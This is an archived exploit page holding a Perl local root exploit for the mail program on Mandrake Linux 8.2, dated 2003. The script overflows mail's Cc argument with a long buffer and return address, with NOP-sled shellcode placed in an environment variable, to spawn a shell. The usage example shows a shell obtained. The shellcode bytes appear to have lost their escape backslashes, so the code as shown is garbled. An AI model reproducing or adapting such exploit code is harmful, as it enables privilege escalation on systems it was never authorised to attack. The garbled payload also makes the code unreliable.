Mandrake Linux 8.2 /usr/mail local exploit (d86mail.pl)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Mandrake Linux 8.2 /usr/mail local exploit (d86mail.pl)
# Published : 2003-06-10
# Author : n/a
# Previous Title : dump 0.4b15 exploit (Redhat 6.2)
# Next Title : MS Windows XP (explorer.exe) Buffer Overflow Exploit

#!/usr/bin/perl
###############################
# Mandrake 8.2 /usr/mail local exploit
#
# Usage:
# perl d86mail.pl [offset]
# Then enter "." (dot) and press 'Enter'
#
# Example:
# [satan@localhost my]$ perl d86mail.pl
# eip: 0xbffffddd
# .[enter]
# Cc: too long to edit
# sh-2.05$
###############################

$shellcode =
   "x31xdbx89xd8xb0x17xcdx80" .
   "x31xdbx89xd8xb0x2excdx80" .
   "xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b" .
   "x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd" .
   "x80xe8xdcxffxffxff/bin/sh";
$size = 1000;
$size2 = 8204;
$retaddr = 0xbffffddd;
$nop = "x90";
$offset = 0;
if (@ARGV == 1) {
  $offset = $ARGV[0];
}
for ($i = 0; $i < ($size - length($shellcode) - 4); $i++) {
   $buffer .= $nop;
}
for ($i = 0; $i < ($size2); $i++) {
   $buffer2 .= "A";
}
$buffer .= $shellcode;
print "eip: 0x", sprintf('%lx',($retaddr + $offset)), "n";
local($ENV{'EVILBUF'}) = $buffer;
$newret = pack('l', ($retaddr + $offset));
$buffer2 .= $newret;
exec("mail -s wow -c $buffer2 root@localhost");

#EOF


# www.Syue.com [2003-06-10]